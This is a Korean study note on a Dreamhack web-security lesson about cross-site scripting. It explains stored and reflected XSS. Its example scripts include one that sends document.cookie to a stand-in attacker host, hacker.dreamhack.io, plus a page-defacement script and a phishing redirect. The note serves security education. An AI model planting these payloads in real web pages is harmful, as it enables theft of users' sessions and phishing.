[Dreamhack] ClientSide: XSS

ClientSide: XSS

---

# 들어가며 - 서론

- 클라이언트 사이드 취약점: 웹 페이지의 이용자를 대상으로 공격할 수 있는 취약점

- 해당 종류의 취약점을 통해 이용자를 식별하기 위한 세션 및 쿠키 정보를 탈취하고 해당 계정으로 임의의 기능을 수행할 수 있음

💡 Cross Site Scripting의 약어가 XSS인 이유

- 스타일시트를 정의하는 언어인 CSS와 약어가 중복되기 때문에 XSS로 명명됨

 

# XSS

1. XSS

- 공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에서 해당 스크립트를 실행할 수 있음

- 공격자는 해당 취약점을 통해 특정 계정의 세션 정보를 탈취하고 해당 계정으로 임의의 기능을 수행할 수 있음

  ex) 드림핵 웹 페이지에서 XSS 취약점이 존재하면 https://dreamhack.io 내에서오리진 권한으로

       악성 스크립트를 삽입함. 이후에 이용자가 악성 스크립트가 포함된 페이지를 방문하면

       공격자가 임의로 삽입한 스크립트가 실행되어 쿠키 및 세션이 탈취될 수 있음

- 해당 취약점은 SOP 보안 정책이 등장하면서 서로 다른 오리진에서는 정보를 읽는 행위가 이전에 비해 힘들어짐

- 그러나 이를 우회하는 다양한 기술이 소개되면서 XSS 공격은 지속되고 있음

 

2. XSS 발생 예시와 종류

- XSS 공격은 이용자가 삽입한 내용을 출력하는 기능에서 발생

  ex) 로그인 시 출력되는 "안녕하세요 OO회원님"과 같은 문구 또는 게시물과 댓글이 있음

- 클라이언트는 HTTP 형식으로 웹 서버에 리소스를 요청하고 서버로부터 받은 응답, 즉 HTML, CSS, JS 등의 웹 리소스를 시각화하여 이용자에게 보여줌

- 이때, HTML, CSS, JS와 같은 코드가 포함된 게시물을 조회할 경우 이용자는 변조된 페이지를 보거나 스크립트가 실행될 수 있음

 

injection 전

injection 후

- XSS는 발생 형태에 따라서 다양한 종류로 구분되는데, 아래에서 XSS 종류와 악성 스크립트가 삽입되는 위치를 확인할 수 있음

 

3. XSS 스크립트의 예시

- 자바스크립트: 웹 문서의 동작을 정의

  > 이용자가 버튼 클릭 시에 어떤 이벤트를 발생시킬지와 데이터 입력 시

     해당 데이터를 전송하는 이벤트를 구현할 수 있음

  > 이용자와의 상호 작용 없이 이용자의 권한으로 정보를 조회하거나 변경하는 등의 행위가 가능

- 위와 같은 행위가 가능한 이유: 이용자를 식별하기 위한 세션 및 쿠키가 웹 브라우저에 저장되어 있기 때문

- 공격자는 자바스크립트를 통해 이용자에게 보여지는 웹 페이지를 조작하거나, 웹 브라우저의 위치를 임의의 주소로 변경할 수 있음

- 자바스크립트는 다양한 동작을 정의할 수 있기 때문에 XSS 공격에 주로 사용됨

  > 자바스크립트를 실행하기 위한 태그로는 <script> 가 있음

- XSS 공격 예시 코드 1. 쿠키 및 세션 탈취 공격 코드

<script>
// "hello" 문자열 alert 실행.
alert("hello");
// 현재 페이지의 쿠키(return type: string)
document.cookie; 
// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);
// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";
// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 http://hacker.dreamhack.io
// "http://hacker.dreamhack.io/?cookie=현재페이지의쿠키" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;
</script>

- XSS 공격 예시 코드 2. 페이지 변조 공격 코드

<script>
// 이용자의 페이지 정보에 접근.
document;
// 이용자의 페이지에 데이터를 삽입.
document.write("Hacked By DreamHack !");
</script>

- XSS 공격 예시 코드 3. 위치 이동 공격 코드

<script>
// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "http://hacker.dreamhack.io/phishing"; 
// 새 창 열기
window.open("http://hacker.dreamhack.io/")
</script>

 

 

# Stored XSS

- 서버의 데이터베이스 또는 파일 등의 형태로 저장된 악성 스크립트를 조회할 때 발생하는 XSS

- 대표적으로 게시글과 댓글에 악성 스크립트를 포함해 업로드하는 방식이 있음

- 게시물은 불특정 다수에게 보여지기 때문에 해당 기능에서 XSS 취약점이 존재할 경우 높은 파급력을 가짐

- 아래 실습 페이지는 게시물의 내용을 그대로 출력하는 모듈

  > <script> 태그 또는 HTML 태그를 삽입하고 반환되는 HTML 코드를 확인함으로써

     Stored XSS의 발생 형태를 확인할 수 있음

다음과 같이 게시글 작성

해당 게시글을 클릭하면 alert 발생

 

 

# Reflected XSS

- 서버가 악성 스크립트가 담긴 요청을 출력할 때 발생

- 대표적으로 게시판 서비스에서 게시물을 조회하기 위한 검색창에서 스크립트를 포함해 검색하는 방식이 있음

  > 이용자가 게시물을 검색하면 서버에서는 검색 결과를 이용자에게 반환함

  > 일부 서비스에서는 검색 결과를 응답에 포함하는데,

     검색 문자열에 악성 스크립트가 포함되어 있다면 Reflected XSS가 발생할 수 있음

- Stored XSS와는 다르게 URL과 같은 이용자의 요청에 의해 발생

  > 공격을 위해서는 타 이용자에게 악성 스크립트가 포함된 링크에 접속하도록 유도해야 함

  > 이용자에게 링크를 직접 전달하는 방법은 악성 스크립트 포함 여부를 이용자가 눈치챌 수 있기 때문에

     Click Jacking 또는 Open Redirect 등 다른 취약점과 연계하여 사용

- 아래 예제는 게시판에서 게시물을 조회하는 기능

  > <script>태그 또는 HTML 태그를 검색창에 삽입하고 반환되는 HTML 코드를 확인함으로써

     Reflected XSS 발생 형태를 확인할 수 있음

 

 

# 마치며

- 키워드

① Cross Site Scripting (XSS): 클라이언트 사이드 취약점, 공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에서 해당 스크립트를 실행하는 취약점

② Stored XSS: 악성 스크립트가 서버 내에 존재, 이용자가 저장된 악성 스크립트를 조회할 때 발생

③ Reflected XSS: 악성 스크립트가 이용자 요청 내에 존재. 이용자가 악성 스크립트가 포함된 요청을 보낸 후 응답을 출력할 때 발생